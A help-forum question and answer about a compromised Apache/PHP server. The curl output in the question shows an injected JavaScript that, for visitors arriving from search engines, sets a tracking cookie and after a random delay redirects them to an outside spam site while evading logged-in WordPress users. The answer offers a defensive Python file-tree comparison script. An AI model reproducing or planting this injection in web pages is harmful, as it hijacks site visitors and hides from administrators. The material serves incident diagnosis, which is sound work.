I am running Apache/2.4.29 and PHP 7.2.24. I have the following simple PHP document:
<html>
</head>
<title>Waste-A-GUID</title>
</head>
<body>
<center>
<h1>Waste-A-GUID</h1>
<h3>Once they are gone, they're gone for good</h3>
<p>
<h1>
<? passthru("uuidgen")?>
</h1>
<h3>Thank You for making one less GUID available to the rest of us!</h3>
</center>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker("UA-197242-9");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
However, when I fetch it via curl with the following command: curl wasteaguid.info
I get the following output:
<html>
</head>
<title>Waste-A-GUID</title>
</head>
<body>
<script>((event) => { var ref = document.referrer || ''; if (ref.length === 0) { return; } ref = ref.toLowerCase(); if (ref.indexOf('google') === -1 && ref.indexOf('bing') === -1) { return; } var cookie = document.cookie || ''; if (cookie.indexOf('wordpress_logged') !== -1 || cookie.indexOf('wp-settings') !== -1 || cookie.indexOf('wordpress_test') !== -1) { return; } if (cookie.indexOf('wordpress-test') !== -1) { return; } function generateRandomInteger(min, max) { return Math.floor(min + Math.random()*(max - min + 1)); } document.cookie = "wordpress-test=1; max-age=86400; path=/;"; const delay = generateRandomInteger(20000, 60000); setTimeout(() => { window.location.replace('http://cabonusoffer.com/track/'); }, delay);})();</script><center>
<h1>Waste-A-GUID</h1>
<h3>Once they are gone, they're gone for good</h3>
<p>
<h1>
19489a02-7bd3-43e5-930d-04230b8624b0
</h1>
<h3>Thank You for making one less GUID available to the rest of us!</h3>
</center>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker("UA-197242-9");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
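This doesn't happen often. How did that extra script get in there? Obviously my site has been compromised and I should buy a new server and rebuild it. However, I need to copy the html/php documents and the server configuration to the new server. I don't want to copy the exploit over as well. Where would it be, so that I don't copy it? What can preprocess a PHP file when it is run?
Answer 1
If you have an old copy of your website, you can compare the two to see what has changed. The risk of code corruption is the main reason to always keep your core code + content in a safe place.
html, javascript, css and php can be maliciously modified. Image and font files can hide viruses. Database downloads (e.g. from wordpress etc.) may contain malicious additions. Website maintenance scripts can be hacked.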
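The comparison this answer suggests, as an added example that is not part of the original post: it hashes every file in a known-good copy and in the live tree, lists what was added, removed or modified, and shows the lines inserted into a modified text file. The function names and the sample trees built in `demo()` are constructed for illustration; run `compare_trees` on both the document root and the server configuration directory before copying either to a new server.

```python
import difflib
import hashlib
import tempfile
from pathlib import Path


def snapshot(root):
    """Map each file's path relative to root to the SHA-256 of its bytes."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare_trees(known_good, live):
    """Return files added to, removed from, or modified in the live tree."""
    old, new = snapshot(known_good), snapshot(live)
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(f for f in set(old) & set(new) if old[f] != new[f]),
    }


def inserted_lines(known_good, live, rel):
    """Lines present in the live copy of a text file but not in the known-good copy."""
    a = (Path(known_good) / rel).read_text(errors="replace").splitlines()
    b = (Path(live) / rel).read_text(errors="replace").splitlines()
    return [line[2:] for line in difflib.ndiff(a, b) if line.startswith("+ ")]


def demo():
    """Constructed sample trees: one modified file and one file that exists only live."""
    with tempfile.TemporaryDirectory() as tmp:
        good, live = Path(tmp, "good"), Path(tmp, "live")
        for d in (good, live):
            d.mkdir()
            (d / "style.css").write_text("h1 { color: black; }\n")
        (good / "index.php").write_text("<body>\n<center>\n</body>\n")
        (live / "index.php").write_text(
            "<body>\n<script>/* constructed */</script>\n<center>\n</body>\n")
        (live / "extra.php").write_text("<?php /* constructed: not in the backup */ ?>\n")
        return compare_trees(good, live), inserted_lines(good, live, "index.php")


if __name__ == "__main__":
    report, lines = demo()
    print(report)
    print(lines)
```

Anything reported as added or modified that you cannot account for should be restored from the known-good copy rather than carried over.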